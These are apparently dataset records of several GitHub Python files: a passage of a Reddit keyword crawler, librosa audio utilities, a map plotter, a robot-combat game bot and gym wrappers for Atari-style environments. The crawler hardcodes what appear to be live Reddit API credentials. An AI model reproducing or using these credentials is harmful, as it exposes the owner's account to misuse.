1\r\n    for post in allPosts:\r\n        scrapePosts(post)\r\n        print(count)\r\n        count = count + 1\r\n\r\n# authentication\r\nmy_client_id = \"Q_pq9JUikHu4tof6QnzJoQ\"\r\nmy_client_secret = \"mPFJC9RLRLEJOavJz6Zv7rdaCrmCXQ\"\r\nmy_user_agent = \"crawlingKeywords\"\r\nreddit = praw.Reddit(client_id = my_client_id, client_secret= my_client_secret, user_agent= my_user_agent)\r\n\r\n#search selection\r\nsubRed = input(\"Type subreddit to search (leave blank for all): \")\r\nkeyword = input(\"Type keyword to search (leave blank for none): \")\r\nhot = int(input(\"Sort by Hot posts? (0=No, 1=Yes): \")) #cast to int so the hot == 0 comparisons work\r\n\r\n# preparing lists to hold data\r\npostList = []\r\nlist1 = []\r\nlist2 = []\r\npostList.append(['title', 'score', 'id', 'subreddit', 'url', 'num_comments', 'body', 'created', 'Comments:'])\r\n\r\n#search either all subreddits or specific\r\nif subRed == \"\":\r\n    allSubreddit(keyword, hot)\r\nelse:\r\n    subredditSearch(subRed, keyword, hot)\r\n\r\n\r\n# convert postList to dataframe and csv file\r\npostList = pd.DataFrame(postList)\r\npostList.to_csv(\"results.csv\", index=False)\r\nprint(\"Crawling finished. 
Results shown in results.csv\")","repo_name":"zanthony42/redditKeywordCrawler","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74016924347","text":"import scipy.signal as sci_signal\nimport os\nimport librosa\nfrom typing import List, Tuple\nimport numpy as np\nimport soundfile as sf\nimport matplotlib.pyplot as plt\nimport json\nfrom tqdm import tqdm\ndef read_wav(path: str):\n    y, sr = librosa.load(path,mono=True)\n    return y, sr\n\ndef write_wav(signal : List[float],fs : int,path: str):\n    sf.write(\n        file = path,\n        data=signal,\n        samplerate=fs,\n        format=\"WAV\"\n    )\n    \ndef write_freq_params (path,params) : \n    params = np.array(params,dtype=np.float32)\n    with open(path,\"wb\") as f : \n        f.write(params.tobytes())\n    \ndef read_freq_params (path):\n    with open(path,\"rb\") as f :\n        params = np.fromfile(f,dtype=np.float32) \n    return params\n    \ndef write_raw(signal, fs, path):\n    signal = np.array(signal, dtype=np.float32)\n    with open(path, \"wb\") as f:\n        # Write the sampling rate (fs) as 4 bytes\n        f.write(fs.to_bytes(4, byteorder=\"little\"))\n        # Write the signal as bytes\n        f.write(signal.tobytes())\n\n\ndef read_raw(path):\n    with open(path, \"rb\") as f:\n        # Read the sampling rate (fs) from the file\n        fs_bytes = f.read(4)\n        fs = int.from_bytes(fs_bytes, byteorder=\"little\")\n        \n        # Read the signal from the file in float32 format\n        signal = np.fromfile(f, dtype=np.float32)\n\n    return signal, fs\n\ndef get_mfcc (signal,fs:int,n_mfcc = 15) :\n    mfcc_signal = librosa.feature.mfcc(\n        y=signal,\n        sr=fs,\n        n_mfcc=n_mfcc\n    )\n    \n    return mfcc_signal\n\n\ndef get_beats(y, sr, hop_length: int = 512):\n    _, frames = librosa.beat.beat_track(sr=sr, y=y, hop_length=hop_length)\n    beat_times = librosa.frames_to_samples(frames=frames, hop_length=hop_length)\n    return beat_times\n\ndef split(signal,fs : int, seconds: float = 0.1):\n    split_length = int(seconds * fs)\n    \n    signal_segments = []\n    for split_point in range(0, len(signal) - split_length, split_length):\n        segment = signal[split_point: split_point + split_length]\n        signal_segments.append(segment)\n    \n    return signal_segments\n\ndef combine(signal_set):\n    num_signals = len(signal_set)\n    \n    if num_signals == 0:\n        raise ValueError(\"No signal sets provided to combine.\")\n    \n    min_length = min([len(signal) for signal, _ in signal_set])\n    combined_signal = np.zeros(min_length)\n    frame_samples = signal_set[0][1] # Take the sampling rate from the first set\n    \n    for i in range(0, num_signals):\n        signal, fs = signal_set[i]\n        \n        if len(signal) != min_length:\n            raise ValueError(f\"Signal in set {i} has a different length. 
All signals must have the same length.\")\n        \n        combined_signal += signal\n    \n    return combined_signal, frame_samples\n\ndef time_normalizer (path : str,time : float = 1.5,write = True) :\n    signal,fs = read_wav(path)\n    target_length = int(time * fs)\n    signal_length = len(signal) \n    if signal_length > target_length : \n        norm_signal = signal[:target_length]\n        \n    elif signal_length < target_length : \n        missing_length = target_length - signal_length\n        norm_signal = np.concatenate((signal,np.zeros(missing_length)))\n        \n    else :\n        norm_signal = signal\n        \n    if(write == True):\n        write_wav(\n            signal=norm_signal,\n            fs=fs,\n            path=path\n        )\n        \n    return norm_signal\n\ndef freq_spec(signal, fs):\n    spec = np.fft.fft(signal)\n    freqs = np.fft.fftfreq(len(spec), 1 / fs)\n    mags = np.abs(spec)\n\n    max_magnitude_index = np.argmax(mags)\n    max_magnitude_frequency = round(freqs[max_magnitude_index], 2)\n\n    plt.figure(figsize=(10, 4))\n    plt.plot(freqs, mags)\n    plt.scatter(freqs[max_magnitude_index], mags[max_magnitude_index], color='red', marker='o', label=f'Max Magnitude Frequency: {max_magnitude_frequency} Hz')\n    plt.title(\"Signal\")\n    plt.xlabel(\"Frequency (Hz)\")\n    plt.ylabel(\"Magnitude\")\n    plt.xlim(0, 2000)\n    plt.grid(True)\n    plt.legend()\n    plt.show()\n    \ndef event_split (signal,fs,t_group_tolerance = 0.1) :\n    \n    group_tolerance = t_group_tolerance * fs\n    peaks,_ = sci_signal.find_peaks(signal,height=0.05)\n    \n    start_idxs = []\n    for i in range(len(peaks)-1) : \n        peak = peaks[i]\n        if peak == peaks[0] : \n            start_idxs.append(peak)\n        else : \n            if peaks[i] - peaks[i - 1] >= group_tolerance : \n                start_idxs.append(peak)\n    \n    fragments = [signal[start_idxs[i] : start_idxs[i + 1]] for i in range(len(start_idxs) - 1)]\n    \n    return fragments\n    \ndef compress(signal,fs) : \n    new_fs = int(5512.5)\n    compress_factor = int(fs / new_fs)\n    comp_signal = sci_signal.decimate(signal,compress_factor)\n    \n    return comp_signal,new_fs\n\ndef aprox_to_notes (arr) :\n    with open(\"assets/notes.json\") as jsonf : \n        note_dict : dict = json.load(jsonf)[\"inverse_note_freqs\"]\n    notes = np.array(list((note_dict.keys())),dtype=float)\n    aproxs = [notes[np.argmin(np.abs(notes - num))] for num in arr]\n    return aproxs\n\nclass Param_generator () : \n    def __init__ (self) : \n        self.param_layout = self.load_param_layout()\n        \n    def load_param_layout (self) :\n        with open(\"assets/notes.json\") as jsonf : \n            param_layout = json.load(jsonf)[\"inverse_note_freqs\"]\n        for key in param_layout : \n            param_layout[key] = 0\n        \n        return param_layout\n    \n    def get_freq_param_set (self,sample_set : list,print_progress=True,return_max_sample_amps = False) :\n        \n        if print_progress == True :\n            sample_set = tqdm(sample_set) \n        \n        result_params = []\n        max_sample_amps = []\n        \n        for signal,fs in sample_set : \n            #get the maximum amplitude of the audio fragment\n            if return_max_sample_amps : \n                max_amp = np.max(np.abs(signal))\n                max_sample_amps.append(max_amp)\n            \n            np.set_printoptions(suppress=True)\n            spec = np.fft.fft(signal)\n            freqs = np.abs(np.fft.fftfreq(len(spec), 1/fs))\n            mags = np.abs(spec)\n            \n            half_len = int(len(freqs) // 2)\n            \n            #frequencies\n            freqs = freqs[:half_len]\n            aprox_freqs = np.array(aprox_to_notes(freqs))\n            #magnitudes\n            mags = np.array(mags[:half_len])\n            max_mag = np.max(mags)\n            round_mags = np.round(np.divide(mags,max_mag),4)\n            \n            #sum the magnitudes of duplicates on a frequency mesh\n            stacks = np.column_stack((aprox_freqs,round_mags))\n            unique_stacks = np.unique(stacks,axis=0)\n\n            unprocessed_param_mesh : dict = dict(self.param_layout)\n            for 
freq,mag in unique_stacks : \n                if mag > 0 and mag < 4200 :\n                    unprocessed_param_mesh[str(freq)] += mag\n            \n            #format and normalize results\n            freqs = np.array(list(unprocessed_param_mesh.keys()),dtype=np.float32)\n            mags = np.array(list((unprocessed_param_mesh.values())),dtype=np.float32)\n            max_mag = np.max(mags)\n            norm_mags = np.round(np.divide(mags,max_mag),4)\n            processed_param_mesh = np.column_stack((freqs,norm_mags))\n            \n            result_params.append(processed_param_mesh)\n        \n        result_params = np.array(result_params,dtype=np.float32)\n        \n        if return_max_sample_amps == True : \n            return result_params,max_sample_amps\n        \n        if return_max_sample_amps == False :\n            return result_params\n    \n    \n\n\n    \n    \n\n    \n\n    \n    \n    \n\n    \n    \n    \n    \n    \n    \n\n    \n    \n    ","repo_name":"radras44/Music_analyzer","sub_path":"utils/audio_utils.py","file_name":"audio_utils.py","file_ext":"py","file_size_in_byte":7879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4883814920","text":"import matplotlib.pyplot as plt\r\nfrom mpl_toolkits.basemap import Basemap\r\n\r\n\r\ndef Draw_Magnetic_Field(Latitude, Longitude, Variable, name: str, year: int = 2005) -> None:\r\n    fig = plt.figure()\r\n    m = Basemap()\r\n    m.drawcoastlines()\r\n    plt.contourf(Latitude * 2.0, Longitude, Variable)\r\n    plt.savefig(f'{name} in year {year}.eps', format='eps')\r\n","repo_name":"ChandlerXij/Homework1_Python_and_Deep_Learning_Basics","sub_path":"Draw.py","file_name":"Draw.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"46524993286","text":"import pygame\nfrom automated_robot import AutomatedRobot\nfrom numpy import random\nimport numpy as np\n\nclass Wefoh(AutomatedRobot):\n\n    def __init__(self, x, y, turn_left=False, **kwargs):\n        kwargs[\"image_path\"] = \"Resources/wefoh.jpeg\"\n        AutomatedRobot.__init__(self, x, y, turn_left, **kwargs)\n\n    def decide(self, other_robot_properties, coins, projectiles):\n        \"\"\"Returns a projectile object or None.\"\"\"\n\n        self.other_robot_properties = other_robot_properties\n\n        # Randomly decide what to upgrade\n        if self.projectile_initial_speed < 5:\n            self.upgrade_stat(self.stat_keys[1])\n        elif self.self_speed < 5:\n            self.upgrade_stat(self.stat_keys[3])\n        elif self.armor < 200:\n            self.upgrade_stat(self.stat_keys[4])\n        else:\n            self.upgrade_stat(self.stat_keys[2])\n\n        move_vector, enemy_coin, distance_to_coin = self.check_coins(coins)\n\n        # Randomly decide where to move\n        for projectile in projectiles:\n            if projectile.pos[0] > (self.pos[0] + self.width) and projectile.velocity[0] > 0:\n                continue\n            elif projectile.pos[0] < self.pos[0] and projectile.velocity[0] < 0:\n                continue\n\n            distance_vector = self.pos - projectile.pos\n            distance = np.sqrt(distance_vector[0]**2 + distance_vector[1]**2)\n\n            p_speed = np.sqrt(projectile.velocity[0]**2 + projectile.velocity[1]**2)\n\n            if 150 > abs(distance) + 5*p_speed - self.max_self_speed*5: \n                move_vector = [projectile.velocity[0], projectile.velocity[1]]\n            \n            if self.pos[0] > 1000:\n                move_vector[0] = -abs(move_vector[0])\n            elif self.pos[0] < 50:\n                move_vector[0] = abs(move_vector[0])\n            \n            if self.pos[1] > 700:\n                move_vector[1] = -abs(move_vector[1])\n            elif self.pos[1] < 50:\n                move_vector[1] = abs(move_vector[1])\n\n        vx,vy = move_vector[0], -move_vector[1]\n\n        self.set_velocity(vy=vy,vx=vx)\n        \n        # Decide to cast a basic attack\n        enemy_pos = other_robot_properties[\"pos\"]\n        enemy_pos[0] = enemy_pos[0] + self.width/2\n        
enemy_pos[1] = enemy_pos[1] + self.height/2\n distance_to_enemy = self.pos - enemy_pos\n\n distance_to_enemy = np.sqrt(distance_to_enemy[0]**2 + distance_to_enemy[1]**2)\n\n distance_enemy_to_coin = enemy_pos - enemy_coin\n distance_enemy_to_coin = np.sqrt(distance_enemy_to_coin[0]**2 + distance_enemy_to_coin[1]**2)\n\n if distance_to_coin > distance_to_enemy:\n bullet = self.cast_basic_attack(enemy_pos)\n elif distance_to_enemy < distance_enemy_to_coin:\n bullet = self.cast_basic_attack(enemy_pos)\n else:\n bullet = self.cast_basic_attack(enemy_coin)\n\n return bullet\n\n def check_coins(self, coins):\n min_dist = 100000\n enemy_min_dist = 100000\n move_vector = np.zeros((2,), dtype=int)\n pos = [self.pos[0] + self.width/2, self.pos[1] + self.height/2]\n enemy_coin_pos = [0,0]\n distance = 100000\n\n for coin in coins:\n distance_vector = coin.pos - pos\n enemy_distance_vector = coin.pos - self.other_robot_properties[\"pos\"]\n \n distance = np.sqrt(distance_vector[0]**2 + distance_vector[1]**2)\n enemy_distance = np.sqrt(enemy_distance_vector[0]**2 + enemy_distance_vector[1]**2)\n \n if enemy_distance < enemy_min_dist:\n enemy_min_dist = enemy_distance\n enemy_coin_pos = coin.pos\n\n if enemy_distance < distance:\n continue\n\n if distance < min_dist:\n min_dist = distance\n move_vector = distance_vector\n\n return move_vector, enemy_coin_pos, distance","repo_name":"zimatek/RobotCombat","sub_path":"automated_robots/robots_concursantes/wefoh.py","file_name":"wefoh.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72000477949","text":"import builtins\nimport base64\nimport datetime\nimport io\nimport os\nimport random\nimport copy\nimport numpy as np\nimport shutil\nimport cv2\nfrom typing import Optional\nimport subprocess\nfrom unittest.mock import patch\nfrom collections import deque\nfrom typing import Optional\nfrom IPython import display\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\nimport gym\nfrom gym import Wrapper\nfrom gym import spaces\nfrom gym.spaces import Box\nfrom gym.wrappers import Monitor as _monitor\nfrom gym.wrappers import LazyFrames\nfrom matplotlib import animation\nfrom pyvirtualdisplay import Display\nfrom trident.context import split_path, make_dir_if_need, sanitize_path\n\nfrom trident.backend.common import get_plateform, get_time_suffix, \\\n OrderedDict\nfrom trident.misc.ipython_utils import *\nfrom trident.reinforcement.utils import ObservationType, ActionStrategy\nfrom trident import context\nfrom trident.data.vision_transforms import Resize\nfrom trident.backend.pillow_backend import array2image, image2array\n\nctx = context._context()\n__all__ = ['NoopResetEnv', 'EpisodicLifeEnv', 'MaxAndSkipEnv', 'RunningAvgAndSkipEnv', 'WarpFrame', 'FrameStack',\n 'TimeAwareObservation', 'VideoRecording']\n\n\nclass NoopResetEnv(gym.Wrapper):\n def __init__(self, env, noop_max=30, preferred_actions=None):\n \"\"\"Sample initial states by taking random number of no-ops on reset.\n No-op is assumed to be action 0.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.noop_max = noop_max\n self.override_num_noops = None\n self.noop_action = 0\n self.preferred_actions = preferred_actions\n # assert env.unwrapped.get_action_meanings()[0] == 'NOOP'\n\n def reset(self, **kwargs):\n \"\"\" Do no-op action for a number of steps in [1, noop_max].\"\"\"\n self.env.reset(**kwargs)\n\n if self.override_num_noops is not None:\n noops = 
self.override_num_noops\n else:\n noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)\n assert noops > 0\n\n obs = None\n remain_noops = noops\n while remain_noops > 0:\n if random.random() < 0.8:\n if isinstance(self.preferred_actions, list) and len(self.preferred_actions) > 0:\n obs, _, done, _ = self.env.step(random.choice(self.preferred_actions))\n else:\n obs, _, done, _ = self.env.step(self.noop_action)\n remain_noops -= 1\n if done:\n obs = self.env.reset(**kwargs)\n return obs\n\n\nclass EpisodicLifeEnv(gym.Wrapper):\n def __init__(self, env):\n \"\"\"Make end-of-life == end-of-episode, but only reset on true game over.\n Done by DeepMind for the DQN and co. since it helps value estimation.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.lives = self.env.unwrapped._life\n self.was_real_done = True\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n self.was_real_done = done\n # check current lives, make loss of life terminal,\n # then update lives to handle bonus lives\n lives = self.env.unwrapped._life\n # lives = self.env.unwrapped.ale.lives()\n if self.lives > lives > 0:\n # for Qbert sometimes we stay in lives == 0 condition for a few frames\n # ,so it's important to keep lives > 0, so that we only reset once\n # the environment advertises done.\n done = True\n self.lives = lives\n return obs, reward, done, info\n\n def reset(self, **kwargs):\n \"\"\"Reset only when lives are exhausted.\n This way all states are still reachable even though lives are episodic,\n and the learner need not know about any of this behind-the-scenes.\n \"\"\"\n if self.was_real_done:\n obs = self.env.reset(**kwargs)\n\n else:\n # no-op step to advance from terminal/lost life state\n obs, _, _, _ = self.env.step(0)\n\n # self.lives = self.env.unwrapped.ale.lives()\n self.lives = self.env.unwrapped._life\n return obs\n\n\nclass MaxAndSkipEnv(gym.Wrapper):\n def __init__(self, env, skip=4):\n \"\"\"Return only every `skip`-th frame\"\"\"\n gym.Wrapper.__init__(self, env)\n # most recent raw observations (for max pooling across time steps)\n self._obs_buffer = np.zeros((2,) + env.observation_space.shape, dtype=np.uint8)\n self._skip = skip\n\n def step(self, action):\n \"\"\"Repeat action, sum reward, and max over last observations.\"\"\"\n total_reward = 0.0\n done = None\n info = None\n for i in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n if i == self._skip - 2: self._obs_buffer[0] = obs\n if i == self._skip - 1: self._obs_buffer[1] = obs\n total_reward += reward\n if done:\n break\n # Note that the observation on the done=True frame\n # doesn't matter\n max_frame = self._obs_buffer.max(axis=0)\n\n return max_frame, total_reward, done, info\n\n def reset(self, **kwargs):\n return self.env.reset(**kwargs)\n\n\nclass RunningAvgAndSkipEnv(gym.Wrapper):\n def __init__(self, env, skip=4):\n \"\"\"Return only every `skip`-th frame\"\"\"\n gym.Wrapper.__init__(self, env)\n # most recent raw observations (for max pooling across time steps)\n self._obs_buffer = np.zeros((skip,) + env.observation_space.shape, dtype=np.uint8)\n self._skip = skip\n\n def step(self, action):\n \"\"\"Repeat action, sum reward, and max over last observations.\"\"\"\n total_reward = 0.0\n done = None\n info = None\n for i in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n\n self._obs_buffer[i] = obs\n\n total_reward += reward\n if done or self.env.unwrapped._is_dying or self.env.unwrapped._is_dead or self.env.unwrapped._life < 2:\n done = True\n 
break\n # Note that the observation on the done=True frame\n # doesn't matter\n weight = np.reshape(np.array([1, 2, 3, 4]), (4, 1, 1, 1))\n max_frame = (weight * self._obs_buffer).sum(axis=0) / 10.0\n\n return max_frame, total_reward, done, info\n\n def reset(self, **kwargs):\n return self.env.reset(**kwargs)\n\n\nclass WarpFrame(gym.ObservationWrapper):\n def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):\n \"\"\"\n Warp frames to 84x84 as done in the Nature paper and later work.\n\n If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which\n observation should be warped.\n \"\"\"\n super().__init__(env)\n self._width = width\n self._height = height\n self._grayscale = grayscale\n self._key = dict_space_key\n if self._grayscale:\n num_colors = 1\n else:\n num_colors = 3\n\n new_space = gym.spaces.Box(\n low=0,\n high=255,\n shape=(self._height, self._width, num_colors),\n dtype=np.uint8,\n )\n if self._key is None:\n original_space = self.observation_space\n self.observation_space = new_space\n else:\n original_space = self.observation_space.spaces[self._key]\n self.observation_space.spaces[self._key] = new_space\n assert original_space.dtype == np.uint8 and len(original_space.shape) == 3\n\n def observation(self, obs):\n if self._key is None:\n frame = obs\n else:\n frame = obs[self._key]\n\n if self._grayscale:\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n frame = cv2.resize(frame[34:194], (self._width, self._height), interpolation=cv2.INTER_AREA)\n if self._grayscale:\n frame = np.expand_dims(frame, -1)\n\n if self._key is None:\n obs = frame\n else:\n obs = obs.copy()\n obs[self._key] = frame\n return obs\n\n\nclass FrameStack(gym.Wrapper):\n def __init__(self, env, k):\n \"\"\"Stack k last frames.\n\n Returns lazy array, which is much more memory efficient.\n\n See Also\n --------\n baselines.common.atari_wrappers.LazyFrames\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.k = k\n self.frames = deque([], maxlen=k)\n shp = env.observation_space.shape\n self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)),\n dtype=env.observation_space.dtype)\n\n def reset(self):\n ob = self.env.reset()\n for _ in range(self.k):\n self.frames.append(ob)\n return self._get_ob()\n\n def step(self, action):\n ob, reward, done, info = self.env.step(action)\n self.frames.append(ob)\n return self._get_ob(), reward, done, info\n\n def _get_ob(self):\n assert len(self.frames) == self.k\n return LazyFrames(list(self.frames))\n\n\nclass TimeAwareObservation(gym.ObservationWrapper):\n \"\"\"Augment the observation with current time step in the trajectory.\n Currently, it only works with one-dimensional observation space.\n It doesn't support pixel observation space yet.\n \"\"\"\n\n def __init__(self, env, max_time=None):\n super(TimeAwareObservation, self).__init__(env)\n self.stay_fool = False\n if max_time is None:\n self.max_time = env.unwrapped._time_last\n else:\n self.max_time = max_time\n\n if isinstance(env.observation_space, Box) and ((\n env.observation_space.low.max() == 0 and env.observation_space.high.min() == 255) and env.observation_space.dtype in [\n np.uint8, np.float32]):\n self.obsetvation_type = ObservationType.Image\n elif isinstance(env.observation_space, Box) and env.observation_space.dtype == np.float32:\n low = np.append(self.observation_space.low, 0.0)\n high = np.append(self.observation_space.high, np.inf)\n self.observation_space = Box(low, high, dtype=np.float32)\n 
self.obsetvation_type = ObservationType.Box\n\n def observation(self, observation):\n\n if self.obsetvation_type == ObservationType.Box:\n return np.append(observation,\n self.t if self.max_time is None or self.max_time == 0 else self.t / float(self.max_time))\n elif self.obsetvation_type == ObservationType.Image and self.max_time > 0:\n ratio = 0\n if hasattr(super(TimeAwareObservation, self).unwrapped, '_time'):\n ratio = (self.max_time - super(TimeAwareObservation, self).unwrapped._time) / float(self.max_time)\n original_dtype = observation.dtype\n pixels = builtins.round(self.observation_space.shape[1] * ratio)\n\n H, W, C = observation.shape\n _observation = observation.copy().astype(np.float32)\n obj_base = np.zeros((W, W, C)).astype(np.float32)\n obj_base[:H, :, :] = _observation\n if self.stay_fool or ratio > 0.5:\n noise_mask = np.ones((1, W, 1))\n noise_mask[:, :W // 4, :] = np.expand_dims(np.expand_dims(np.linspace(0.2, 1, W // 4), 0), -1).astype(\n np.float32)\n noise_mask = np.concatenate([noise_mask, noise_mask, noise_mask], axis=-1)\n obj_base = np.clip(\n obj_base * noise_mask + (1 - noise_mask) * (80 * np.random.standard_normal((W, W, C))), 0, 255)\n\n if len(self.observation_space.shape) == 2:\n obj_base[-5:, :pixels] = 0\n obj_base[-5:, pixels:] = 255\n elif len(self.observation_space.shape) == 3:\n obj_base[-5:, :pixels, :] = 0\n if self.stay_fool:\n obj_base[-5:, pixels:, :] = 255\n obj_base[-5:, pixels:, 1:] = 0\n else:\n obj_base[-5:, pixels:, :] = 255\n return np.clip(obj_base, 0, 255).astype(original_dtype)\n\n def step(self, action):\n observation, reward, done, info = self.env.step(action)\n if 'stay_fool' in info:\n self.stay_fool = info['stay_fool']\n time_awareness_obj = self.observation(observation)\n return time_awareness_obj, reward, done, info\n\n def reset(self, **kwargs):\n self.t = 0\n return self.env.reset(**kwargs)\n\n # def render(self, mode='human', **kwargs):\n # if mode=='human':\n # return super(TimeAwareObservation, self).render(mode, **kwargs)\n # elif mode == 'observation':\n # return self.observation(super(TimeAwareObservation, self).render('rgb_array').copy())\n # elif mode=='rgb_array':\n # return super(TimeAwareObservation, self).render('rgb_array')\n\n\nclass _VirtualDisplaySingleton(object):\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, \"_instance\"):\n cls._instance = super().__new__(cls)\n return cls._instance\n\n def __init__(self, size=(1024, 768)):\n self.size = size\n\n if not hasattr(self, \"_display\"):\n self._display = Display(visible=0, size=self.size)\n original = subprocess.Popen\n\n def Popen(cmd, pass_fds, stdout, stderr, shell):\n return original(cmd, pass_fds=pass_fds,\n stdout=stdout, stderr=stderr,\n shell=shell, preexec_fn=os.setpgrp)\n\n with patch(\"subprocess.Popen\", Popen):\n self._display.start()\n\n def _restart_display(self):\n self._display.stop()\n self._display.start()\n\n\nclass VirtualDisplay(Wrapper):\n \"\"\"\n Wrapper for running Xvfb\n \"\"\"\n\n def __init__(self, env, size=(1024, 768)):\n \"\"\"\n Wrapping environment and start Xvfb\n \"\"\"\n super().__init__(env)\n self.size = size\n self._display = _VirtualDisplaySingleton(size)\n\n def render(self, mode=None, **kwargs):\n \"\"\"\n Render environment\n \"\"\"\n return self.env.render(mode='rgb_array', **kwargs)\n\n\nclass VideoRecording(gym.Wrapper):\n \"\"\"\n Monitor wrapper to store images as videos.\n\n This class is a shin wrapper for `gym.wrappers.Monitor`. 
This class also\n have a method `display`, which shows recorded movies on Notebook.\n\n See Also\n --------\n gym.wrappers.Monitor : https://github.com/openai/gym/blob/master/gym/wrappers/monitor.py\n \"\"\"\n\n def __init__(self, env, directory: Optional[str] = None, enabled=False, fps=None, min_frames=None,\n done_then_finish=True, name_prefix=None, **kwargs):\n \"\"\"\n Initialize Monitor class\n\n Parameters\n ----------\n directory : str, optional\n Directory to store output movies. When the value is `None`,\n which is default, \"%Y%m%d-%H%M%S\" is used for directory.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self._recording_enabled = enabled\n self._is_recording = False\n self.num_frames = 0\n self.directory = directory\n self.done_then_finish = done_then_finish\n self.video_tags = OrderedDict()\n if directory is None:\n self.directory = make_dir_if_need('videos')\n else:\n self.directory = make_dir_if_need(sanitize_path(directory))\n self.fps = fps\n if 'video.frames_per_second' not in self.env.metadata:\n self.env.metadata['video.frames_per_second'] = self.fps if self.fps is not None else 30\n self.min_frames = min_frames\n self.videos = []\n self._display = None\n shp = env.observation_space.shape\n if get_plateform() != 'windows':\n self._display = _VirtualDisplaySingleton((shp[1], shp[0]))\n if name_prefix is None:\n name_prefix = 'video'\n\n self.name_prefix = name_prefix\n self.current_recording_path = None\n self.vw = None\n # self.resize = Resize((84, 84), keep_aspect=True)\n # self.vw2 = None\n self.frame_steps = 0\n self.prev_screen = None\n self.current_screen = None\n self.prev_observation = None\n self.current_observation = None\n self.prev_reward = 0\n self.prev_done = False\n self.info = None\n self.frame_stats = []\n\n def create_video_writer(self):\n shp = (240, 240, 3) # super().render(mode='rgb_array').shape\n video_name = os.path.join(self.directory, self.name_prefix + '_' + get_time_suffix() + '.avi')\n # video_name2 = os.path.join(self.directory, self.name_prefix + '_obj_' + get_time_suffix() + '.avi')\n self.current_recording_path = video_name\n # self.current_recording_path2 = video_name2\n\n self.vw = cv2.VideoWriter(video_name, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),\n if_none(self.fps, self.env.metadata['video.frames_per_second']), (shp[1], shp[0]))\n self.video_tags = OrderedDict()\n\n # self.vw2 = cv2.VideoWriter(video_name2, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), self.env.metadata['video.frames_per_second'], (84*4, 84*4))\n\n self._is_recording = True\n self.frame_steps = 0\n\n def close_video_recorder(self):\n\n if self._is_recording and (self.vw is not None and self.frame_steps > 0):\n self.vw.release()\n self.vw = None\n # self.vw2.release()\n self._is_recording = False\n\n if 'keep' in self.video_tags and self.video_tags['keep']:\n if 'name_suffix' in self.video_tags:\n folder, filename, ext = split_path(self.current_recording_path)\n os.rename(self.current_recording_path,\n os.path.join(folder, filename + '_' + self.video_tags['name_suffix'] + ext))\n self.videos.append(self.current_recording_path)\n elif 'keep' in self.video_tags and not self.video_tags['keep']:\n os.remove(self.current_recording_path)\n elif (self.min_frames is not None and self.frame_steps < self.min_frames):\n os.remove(self.current_recording_path)\n # os.remove(self.current_recording_path2 )\n else:\n self.videos.append(self.current_recording_path)\n\n def step(self, action):\n \"\"\"\n Step Environment\n \"\"\"\n\n try:\n\n observation, reward, done, info = 
self.env.step(action)\n\n self.done = done\n\n new_render = self.render('rgb_array').copy()\n\n self.prev_screen = copy.deepcopy(self.current_screen)\n self.current_screen = new_render\n self.prev_observation = copy.deepcopy(self.current_observation)\n self.current_observation = observation.copy()\n\n if self.current_observation.shape != self.prev_observation.shape:\n self.prev_observation = self.current_observation.copy()\n\n if self.vw is None:\n self.create_video_writer()\n\n # if self.done_then_finish and self.done:\n # self.close_video_recorder()\n\n else:\n if self._recording_enabled and self._is_recording:\n self.vw.write(cv2.cvtColor(self.current_observation, cv2.COLOR_RGB2BGR))\n self.frame_steps += 1\n self.env.unwrapped.frame_steps = self.frame_steps\n # obj_frame= cv2.resize(cv2.cvtColor(observation.copy().copy(), cv2.COLOR_RGB2BGR),(84*4,84*4),cv2.INTER_LANCZOS4)\n # self.vw2.write(obj_frame)\n\n self.prev_reward = reward\n self.prev_done = done\n self.info = info\n\n self.state = observation\n return self.state.copy(), reward, done, info\n except KeyboardInterrupt as k:\n self.close_video_recorder()\n raise\n\n def reset(self, **kwargs):\n \"\"\"\n Reset Environment\n \"\"\"\n try:\n\n if self.done_then_finish and self._is_recording and self.frame_steps > 0:\n self.close_video_recorder()\n if self._recording_enabled and (not self._is_recording or self.vw is None):\n self.create_video_writer()\n\n self.frame_stats = []\n self.prev_reward = 0\n self.prev_done = False\n self.info = None\n self.frame_steps = 0\n self.env.unwrapped.frame_steps = self.frame_steps\n observation = self.env.reset()\n\n self.prev_observation = observation\n self.current_observation = observation\n self.state = observation\n\n return self.state\n except KeyboardInterrupt:\n self.close_video_recorder()\n raise\n\n def display(self, reset: bool = False):\n \"\"\"\n Display saved all movies\n\n If video is running, stop and flush the current video then display all.\n\n Parameters\n ----------\n reset : bool, optional\n When `True`, clear current video list. 
